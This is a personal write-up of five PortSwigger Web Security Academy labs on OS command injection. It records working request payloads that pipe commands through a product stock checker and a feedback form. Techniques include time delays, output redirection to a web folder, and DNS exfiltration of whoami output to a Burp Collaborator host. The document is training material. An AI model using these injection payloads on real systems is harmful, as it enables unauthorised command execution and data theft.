---
title: 'Command Injection'
subtitle: 'PortSwigger Web Security Academy Labs'
author: 'Dan Egner'
date: 'PDF generated: \today'

titlepage: true
toc: true
---




# OS command injection, simple case

<https://portswigger.net/web-security/os-command-injection/lab-simple>

Completed: 2022-12-15


## Summary

TKTK


## Objective

> This lab contains an OS command injection vulnerability in the product stock checker.
>
> The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response.
>
>> To solve the lab, execute the `whoami` command to determine the name of the current user.


## Solution

1. Go to `/product?productId=1`
1. Change the body:

	from...

    ```
	productId=1&storeId=London
    ```

	to...

    ```
	productId=1&storeId=1|whoami
    ```

    The username is returned in the response.




# Blind OS command injection with time delays

<https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays>

Completed: 2022-12-15


## Summary

TKTK


## Objective

> This lab contains a blind OS command injection vulnerability in the feedback function.
>
> The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.
>
>> To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second delay.


## Solution

1. Send `POST /feeback/submit` to Repeater
1. Change the body `email` parameter like so, then send:

    ```
	csrf=jMehxsUFZntVKxiz389clLnFGPBTHiFr&name=test&email=x||ping+-c+10+127.0.0.1||&subject=test&message=test
    ```




# Blind OS command injection with output redirection

<https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection>

Completed: 2022-12-15


## Summary

TKTK


## Objective

> This lab contains a blind OS command injection vulnerability in the feedback function.
>
> The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:
>
> ```
> /var/www/images/
> ```
>
> The application serves the images for the product catalog from this location. You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.
>
>> To solve the lab, execute the `whoami` command and retrieve the output.


## Solution

1. Confirm blind OS command injection (with time delay) is present:

    ```
	csrf=ARex08OA9aidiRTO2CcUyVfO7oGHufk3&name=test&email=test%40test.com||ping+-c+10+127.0.0.1||&subject=test&message=test
    ```

1. Redirect `whoami` output to file in writable directory:

    ```
	csrf=VbphCpfc2tGdgXuI62rOrwBb3TjNQmgU&name=test&email=test%40test.com||whoami>/var/www/images/whoami.txt||&subject=test&message=test
    ```

1. By inspecting page source, note that images are loaded like so: `/image?filename=...`
1. Retrieve saved file:

    ```
	https://0a73005603e58bbfc2cd0d7c0004005a.web-security-academy.net/image?filename=whoami.txt
    ```




# Blind OS command injection with out-of-band interaction

<https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band>

Completed: 2022-12-15


## Summary

TKTK


## Objective

> This lab contains a blind OS command injection vulnerability in the feedback function.
>
> The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application's response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.
>
>> To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator. 


## Solution

1. Use Burp Collaborator to create a server:

    ```
	m6tf89yzmnvkumftd1t7qeroifo6cw0l.oastify.com
    ```

1. Trigger a DNS lookup to that server:

    ```
	csrf=LwEWvHhWJZarHlJC5CS7vbRH5aNy80kp&name=test&email=test%40test.com||nslookup+m6tf89yzmnvkumftd1t7qeroifo6cw0l.oastify.com||&subject=test&message=test
    ```




# Blind OS command injection with out-of-band data exfiltration

<https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration>

Completed: 2022-12-15


## Summary

TKTK


## Objective

> This lab contains a blind OS command injection vulnerability in the feedback function.
>
> The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application's response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.
>
>> To solve the lab, execute the `whoami` command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to complete the lab. 


## Solution

1. Use Burp Collaborator to create a server:

    ```
	m6tf89yzmnvkumftd1t7qeroifo6cw0l.oastify.com
    ```

1. Trigger a DNS lookup to that server, including the output of `whoami` within the lookup:

    ```
	csrf=J2mxALO8JBQFqJFMLdyprfUgixudEia7&name=test&email=test%40test.com||nslookup+`whoami`.t71m9gz6nuwrvtg0e8uerlsvjmpid81x.oastify.com||&subject=test&message=test
	```

	The Collaborator server received a DNS lookup of type A for the domain name `peter-DP5Jmn.t71m9gz6nuwrvtg0e8uerlsvjmpid81x.oastify.com`.

1. Submit the username as requested

